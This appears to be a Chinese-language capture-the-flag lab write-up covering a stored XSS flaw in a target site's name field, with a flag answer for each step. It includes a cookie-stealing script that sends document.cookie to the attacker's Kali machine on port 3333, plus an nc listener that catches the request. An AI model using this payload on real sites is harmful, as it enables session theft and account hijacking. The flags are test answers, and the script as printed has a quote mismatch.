1.在渗透机Kali Linux中访问靶机服务器Web页面，注册账号并登陆，找到存在XSS执行漏洞的页面，将该页面中存在XSS执行漏洞的对象名作为FLAG提交；

先来到Web页面，注册一个账号

登录进来后，找到个人中心，试着将姓名那里修改为<script>alert(/xss/);</script>

然后使用admin用户登录后台，模拟受害者

找到用户中心

成功弹出，所以姓名处存在xss漏洞

Flag：name

2.构造Cookie反弹JS脚本，将该JS代码中使用的对象及方法作为FLAG（形式：对象,方法）进行提交；

在kali的/var/www/html目录新建一个js文件，内容为

document.write('<img src="http://渗透机IP地址:3333/xss?val" + document.cookie + '" width=0 height=0 />');

Flag：document.cookie

3.在渗透机Kali Linux重启Web服务，将重启使用的命令作为FLAG进行提交；

重启apache2服务的命令是 service apache2 restart

Flag：service apache2 restart

4.再靶机服务器中利用原有的XSS漏洞调用上述JS脚本，在渗透机Kali Linux开启3333端口监听，将开启端口监听使用的命令作为FLAG提交；

使用nc命令监听3333端口 # nc -l -p 3333

Flag：nc -l -p 3333

5.在渗透机Kali Linux开启3333端口监听，将开启端口监听后接受回应的第一行的第一个单词作为FLAG提交；

我们知道在网站的姓名处存在xxs漏洞，我们接着使用注册的用户登录到网站后台，将姓名处的值修改为 引入外部的js值，其中的IP为Kali的ip

修改好之后再使用admin用户登录后台，点击用户管理

成功弹出

Flag：GET

6.在渗透机Kali Linux中开启3333端口监听，将开启端口监听后接收回应的第五行的第一个单词作为FLAG提交；

Flag：deflate